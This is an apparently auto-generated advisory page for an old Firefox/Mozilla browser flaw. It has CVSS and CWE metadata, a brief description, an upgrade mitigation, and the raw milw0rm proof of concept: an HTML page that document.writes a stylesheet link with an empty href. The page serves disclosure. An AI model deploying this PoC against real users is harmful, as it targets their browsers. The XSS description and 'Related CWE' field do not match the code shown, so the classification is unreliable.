Vendor: Firefox
By: Kubbo
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: Firefox
Affected Version From: Firefox 1.0.7 and below
Affected Version To: Mozilla Browser 1.7.12 and below
Patch Exists: YES
Related CWE: CVE-2005-3106
CPE: a:mozilla:firefox:1.0.7
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2005

Firefox <= 1.0.7 and Mozilla Browser <= 1.7.12 XSS Vulnerability

A vulnerability in Firefox 1.0.7 and below and Mozilla Browser 1.7.12 and below allows remote attackers to inject arbitrary web script or HTML via a crafted link. This is due to the browser not properly sanitizing user-supplied input before using it in dynamically generated HTML pages. An attacker can exploit this vulnerability by enticing a user to click on a malicious link.

Mitigation:

Upgrade to Firefox 1.0.8 or later, or Mozilla Browser 1.7.13 or later.

Exploit-DB raw data:

<!-- Tested on Firefox <= 1.0.7
             Mozilla Browser <= 1.7.12 
                         /str0ke -->

<!-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. -->

<html>
	<script language="JavaScript">
		document.write('<link rel="stylesheet" href="http://">');
	</script>
</html>

<!-- Affects Firefox 1.0.7 and below. Adara's ears are dangerous. -->

# milw0rm.com [2005-10-17]